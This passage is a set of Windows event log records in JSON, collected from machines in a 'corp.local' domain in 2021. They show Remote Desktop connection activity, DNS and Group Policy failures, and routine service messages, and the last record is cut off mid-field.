{"EventTime":"2021-09-21T12:21:57.495457+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":135,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":15,"RecordNumber":23816,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1332,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The multi-transport connection finished for tunnel: 1, its transport type set to TCP: Reason Code: 1 (No Client UDP Support).","Category":"RemoteFX module","Opcode":"EstablishConnection","TunnelID":"1","TransportType":"TCP: Reason Code: 1 (No Client UDP Support)","EventReceivedTime":"2021-09-21T14:23:58.858489+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:16:17.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5211,"SourceName":"Microsoft-Windows-WAS","ProviderGuid":"{524B5D04-133C-4A62-8362-64E8EDB9CE40}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":645222,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"The Windows Process Activation Service (WAS) started with 'Classic' mode using 'ConfigurationSystem'","RunningMode":"Classic","ConfigurationReader":"ConfigurationSystem","EventReceivedTime":"2021-09-21T14:21:58.090244+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:16:19.889322+05:45","Hostname":"DC01.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5611,"SourceName":"Microsoft-Windows-WMI","ProviderGuid":"{1EDEEE53-0AFE-4609-B846-D8C0B2075B1F}","Version":2,"TaskValue":0,"OpcodeValue":0,"RecordNumber":119371,"ExecutionProcessID":912,"ExecutionThreadID":1248,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The Windows Management Instrumentation service has detected an inconsistent system shutdown.","Opcode":"Info","EventData":"","EventReceivedTime":"2021-09-21T14:21:58.121548+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:16:30.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":1008,"SourceName":"Microsoft-Windows-Perflib","ProviderGuid":"{13B197BD-7CEE-4B4E-8DD0-59314CE374CE}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":119375,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The Open Procedure for service \"BITS\" in DLL \"C:\\Windows\\System32\\bitsperf.dll\" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.","UserData":"<EventXML xmlns='Perflib'><param1>BITS</param1><param2>C:\\Windows\\System32\\bitsperf.dll</param2><binaryDataSize>8</binaryDataSize><binaryData>0200000000000000</binaryData></EventXML>","EventReceivedTime":"2021-09-21T14:21:58.168368+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:16:56.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":6006,"SourceName":"Microsoft-Windows-Winlogon","ProviderGuid":"{DBE9B383-7CF3-4331-91CC-A3CB16A3B538}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":119381,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The winlogon notification subscriber <GPClient> took 64 second(s) to handle the notification event (CreateSession).","EventData":"<Data>GPClient</Data><Data>64</Data><Data>CreateSession</Data><Binary>04000000</Binary>","EventReceivedTime":"2021-09-21T14:21:58.308992+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:16:53.738177+05:45","Hostname":"DC01.corp.local","Keywords":"288230376151711808","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":30800,"SourceName":"Microsoft-Windows-SMBClient","ProviderGuid":"{988C59C5-0A1C-45B6-A555-0C62276E327D}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":1290,"ExecutionProcessID":4,"ExecutionThreadID":464,"Channel":"Microsoft-Windows-SmbClient/Connectivity","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The server name cannot be resolved.\r\n\r\nError: The object was not found.\r\n\r\nServer name: corp.local\r\n\r\nGuidance:\r\nThe client cannot resolve the server address in DNS or WINS. This issue often manifests immediately after joining a computer to the domain, when the client's DNS registration may not yet have propagated to all DNS servers. You should also expect this event at system startup on a DNS server (such as a domain controller) that points to itself for the primary DNS. You should validate the DNS client settings on this computer using IPCONFIG /ALL and NSLOOKUP.","Opcode":"Info","Reason":"1","Status":"3221226021","ServerNameLength":"19","ServerName":"corp.local","EventReceivedTime":"2021-09-21T14:21:58.277751+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:16:20.311199+05:45","Hostname":"DC01.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":4200,"SourceName":"Microsoft-Windows-Iphlpsvc","ProviderGuid":"{66A5C15C-4F8E-4044-BF6E-71D896038977}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":645239,"ExecutionProcessID":912,"ExecutionThreadID":2008,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Isatap interface isatap.{48B8E372-14A4-40C0-9732-C046D6CCC5CD} with address fe80::5efe:192.168.2.47 has been brought up.","Opcode":"Info","ProtocolType":"1","Interface":"isatap.{48B8E372-14A4-40C0-9732-C046D6CCC5CD}","Address":"fe80::5efe:192.168.2.47","EventReceivedTime":"2021-09-21T14:21:58.137122+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:16:16.670582+05:45","Hostname":"DC01.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":143,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":645225,"ExecutionProcessID":940,"ExecutionThreadID":1768,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time service has started advertising as a good time source.","Opcode":"Info","EventReceivedTime":"2021-09-21T14:21:58.090244+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:35:53.729610+05:45","Hostname":"IT01.corp.local","Keywords":"9259400833873739776","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":4111,"SourceName":"Microsoft-Windows-CAPI2","ProviderGuid":"{5BBCA4A8-B209-48DC-A8C7-B23D3E5216FB}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":13072,"ExecutionProcessID":1264,"ExecutionThreadID":6800,"Channel":"Application","Message":"Successful auto update of third-party root list with effective date: ???Friday, ???September ???10, ???2021 9:54:29 PM.","Opcode":"Info","Data":"???Friday, ???September ???10, ???2021 9:54:29 PM","EventReceivedTime":"2021-09-21T14:23:59.967874+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:28:56.420828+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5478,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12291,"OpcodeValue":0,"RecordNumber":4046569,"ActivityID":"{1861A8E2-AEB2-0000-61A9-6118B2AED701}","ExecutionProcessID":640,"ExecutionThreadID":5732,"Channel":"Security","Message":"The IPsec Policy Agent service was started.","Category":"IPsec Driver","Opcode":"Info","EventReceivedTime":"2021-09-21T14:23:59.420991+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:57.642405+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":66,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":13,"RecordNumber":23820,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1428,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The connection RDP-Tcp#7 was assigned to session 2","Category":"RemoteFX module","Opcode":"RCMProtocolImpl","ConnectionName":"RDP-Tcp#7","SessionID":"2","EventReceivedTime":"2021-09-21T14:23:58.858489+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:55.610612+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":65,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":13,"RecordNumber":23799,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1304,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Connection RDP-Tcp#7 created ","Category":"RemoteFX module","Opcode":"RCMProtocolImpl","ConnectionName":"RDP-Tcp#7","EventReceivedTime":"2021-09-21T14:23:58.842866+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T11:29:34.917615+05:45","Hostname":"IT03.corp.local","Keywords":"9223372036854775808","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":1054,"SourceName":"Microsoft-Windows-GroupPolicy","ProviderGuid":"{AEA1B4FA-97D1-45F2-A64C-4D69FFFD92C9}","Version":0,"TaskValue":0,"OpcodeValue":1,"RecordNumber":108893,"ActivityID":"{0551BACE-C2F9-4DF1-BC76-C71E60B0C2B5}","ExecutionProcessID":1520,"ExecutionThreadID":372,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The processing of Group Policy failed. Windows could not obtain the name of a domain controller. This could be caused by a name resolution failure. Verify your Domain Name System (DNS) is configured and working correctly.","Opcode":"Start","SupportInfo1":"1","SupportInfo2":"2847","ProcessingMode":"0","ProcessingTimeInMilliseconds":"0","ErrorCode":"1355","ErrorDescription":"The specified domain either does not exist or could not be contacted. ","EventReceivedTime":"2021-09-21T14:22:02.012139+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T00:25:46.924083+05:45","Hostname":"ACC01","Keywords":"4611686018427387904","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":8016,"SourceName":"Microsoft-Windows-DNS-Client","ProviderGuid":"{1C95126E-7EEA-49A9-A3FE-A378B03DDB4D}","Version":0,"TaskValue":1028,"OpcodeValue":0,"RecordNumber":56634,"ExecutionProcessID":1348,"ExecutionThreadID":2184,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The system failed to register host (A or AAAA) resource records (RRs) for network adapter\r\nwith settings:\r\n\r\n Adapter Name : {0CAD76ED-84FA-4588-9F25-B4D5BC9EBE1E}\r\n Host Name : ACC01\r\n Primary Domain Suffix : prod.corp.local\r\n DNS server list :\r\n \t192.168.4.203, 8.8.8.8\r\n Sent update to server : <?>\r\n IP Address(es) :\r\n 192.168.4.204\r\n\r\nThe reason the system could not register these RRs was because the DNS server failed the update request. The most likely cause of this is that the authoritative DNS server required to process this update request has a lock in place on the zone, probably because a zone transfer is in progress.\r\n\r\nYou can manually retry DNS registration of the network adapter and its settings by typing 'ipconfig /registerdns' at the command prompt. If problems still persist, contact your DNS server or network systems administrator.","Opcode":"Info","AdapterName":"{0CAD76ED-84FA-4588-9F25-B4D5BC9EBE1E}","AdapterSuffixName":"prod.corp.local","DnsServerList":"\t192.168.4.203, 8.8.8.8","Sent UpdateServer":"<?>","Ipaddress":"192.168.4.204","ErrorCode":"9002","EventReceivedTime":"2021-10-02T00:25:48.455295+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:15:16.601262+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":229,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":19,"RecordNumber":23700,"ActivityID":"{F462869C-F81B-462A-8936-3BBC82B90000}","ExecutionProcessID":1016,"ExecutionThreadID":668,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"'Creating standard listener:RDP-Tcp' in CUMRDPProtocolManager::CreateListener at 4161 err=[0x0]","Category":"RemoteFX module","Opcode":"Runtime","Name":"CUMRDPProtocolManager","CustomLevel":"'Creating standard listener:RDP-Tcp' in CUMRDPProtocolManager::CreateListener at 4161 err=[0x0]","EventReceivedTime":"2021-09-21T12:15:41.495882+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:06:21.206256+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":227,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":19,"RecordNumber":23862,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":5388,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"'Failed CreateVirtualChannel call on this Connections Stack' in CUMRDPConnection::CreateVirtualChannel at 2622 err=[0xd0000001]","Category":"RemoteFX module","Opcode":"Runtime","Name":"CUMRDPConnection","Value":"3489660929","CustomLevel":"'Failed CreateVirtualChannel call on this Connections Stack' in CUMRDPConnection::CreateVirtualChannel at 2622 err=[0xd0000001]","EventReceivedTime":"2021-09-21T14:24:00.311619+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:15:16.651673+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":70,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":13,"RecordNumber":23702,"ActivityID":"{F462869C-F81B-462A-8936-3BBC82B90000}","ExecutionProcessID":1016,"ExecutionThreadID":668,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The listener listens with display driver rdpudd.dll available.","Category":"RemoteFX module","Opcode":"RCMProtocolImpl","DisplayDriverName":"rdpudd.dll","EventReceivedTime":"2021-09-21T12:15:41.495882+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:06:23.783767+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":72,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":13,"RecordNumber":23879,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1296,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Interface method called: OnDisconnected(server initiated)","Category":"RemoteFX module","Opcode":"RCMProtocolImpl","MethodName":"OnDisconnected(server initiated)","EventReceivedTime":"2021-09-21T14:24:00.327235+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:34:49.600351+05:45","Hostname":"IT01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":330,"SourceName":"ESENT","TaskValue":1,"RecordNumber":13061,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"svchost (564,D,50) DS_Token_DB: The database [C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\DataSharing\\Storage\\DSTokenDB2.dat] format version is being held back to 8920 (0x22d8) due to application parameter setting of 0x410022D8 (8920 | JET_efvAllowHigherPersistedFormat). Current default engine version: 9100 (0x238c).","Category":"General","Opcode":"Info","Data":"svchost","Data_1":"564,D,50","Data_2":"DS_Token_DB: ","Data_3":"C:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\DataSharing\\Storage\\DSTokenDB2.dat","Data_4":"0x410022D8 (8920 | JET_efvAllowHigherPersistedFormat)","Data_5":"8920 (0x22d8)","Data_6":"9100 (0x238c)","EventReceivedTime":"2021-09-21T14:23:59.639730+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:06:23.760548+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":144,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":15,"RecordNumber":23878,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":5388,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"TCP socket was gracefully terminated","Category":"RemoteFX module","Opcode":"EstablishConnection","EventReceivedTime":"2021-09-21T14:24:00.327235+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:06:23.749457+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":148,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":17,"RecordNumber":23874,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1296,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Channel rdpgrfx has been closed between the server and the client on transport tunnel: 0.","Category":"RemoteFX module","Opcode":"CloseConnection","ChannelName":"rdpgrfx","TunnelID":"0","EventReceivedTime":"2021-09-21T14:24:00.327235+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:55.618707+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":141,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":11,"RecordNumber":23802,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":3744,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"PerfCounter session started with instance ID 7","Category":"RemoteFX module","Opcode":"Initialize","InstanceID":"7","EventReceivedTime":"2021-09-21T14:23:58.842866+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:06:23.744984+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":103,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":17,"RecordNumber":23873,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":3236,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The disconnect reason is 12","Category":"RemoteFX module","Opcode":"CloseConnection","ReasonCode":"12","EventReceivedTime":"2021-09-21T14:24:00.327235+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:55.606887+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":131,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":15,"RecordNumber":23798,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1320,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The server accepted a new TCP connection from client 172.16.20.11:64184.","Category":"RemoteFX module","Opcode":"EstablishConnection","ConnType":"TCP","ClientIP":"172.16.20.11:64184","EventReceivedTime":"2021-09-21T14:23:58.842866+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:34:49.600351+05:45","Hostname":"IT01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":641,"SourceName":"ESENT","TaskValue":1,"RecordNumber":13062,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"svchost (564,D,50) DS_Token_DB: The log format feature version 8940 (0x22ec - 8.6.20) could not be used due to the current log format 8.5.16, controlled by the parameter 0x410022D8 (8920 | JET_efvAllowHigherPersistedFormat).","Category":"General","Opcode":"Info","Data":"svchost","Data_1":"564,D,50","Data_2":"DS_Token_DB: ","Data_3":"0x410022D8 (8920 | JET_efvAllowHigherPersistedFormat)","Data_4":"8940 (0x22ec - 8.6.20)","Data_5":"8.5.16","EventReceivedTime":"2021-09-21T14:23:59.639730+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:06:23.783901+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":145,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":19,"RecordNumber":23881,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1296,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"During this connection, server has not sent data or graphics update for 0 seconds (Idle1: 0, Idle2: 0).","Category":"RemoteFX module","Opcode":"Runtime","IdleSeconds":"0","IdleSeconds1":"0","IdleSeconds2":"0","EventReceivedTime":"2021-09-21T14:24:00.327235+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:06:21.206005+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":132,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":15,"RecordNumber":23860,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":3236,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"A channel Microsoft::Windows::RDS::Geometry::v08.01 has been connected between the server and the client using transport tunnel: 0.","Category":"RemoteFX module","Opcode":"EstablishConnection","ChannelName":"Microsoft::Windows::RDS::Geometry::v08.01","TunnelID":"0","EventReceivedTime":"2021-09-21T14:24:00.311619+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:57.393151+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":104,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":15,"RecordNumber":23808,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":3744,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Client timezone is [5] hour from UTC; ","Category":"RemoteFX module","Opcode":"EstablishConnection","TimezoneBiasHour":[5],"EventReceivedTime":"2021-09-21T14:23:58.842866+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:57.664163+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":33,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":0,"TaskValue":4,"OpcodeValue":11,"RecordNumber":23821,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1428,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Remote Desktop Protocol will use the RemoteFX guest mode module to connect to the client computer.","Category":"RemoteFX module","Opcode":"Initialize","EventReceivedTime":"2021-09-21T14:23:58.858489+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T12:21:57.702883+05:45","Hostname":"IT01.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":162,"SourceName":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS","ProviderGuid":"{1139C61B-B549-4251-8ED3-27250A1EDEC8}","Version":"0xa0400","TaskValue":4,"OpcodeValue":19,"RecordNumber":23829,"ActivityID":"{F4206F0D-B6B3-4F45-855D-4AB4EB740000}","ExecutionProcessID":1016,"ExecutionThreadID":1188,"Channel":"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"The client supports version 0xA0400 of the RDP graphics protocol, client mode: 2, AVC available: 0, Initial profile: 2. Server: IT01","Category":"RemoteFX 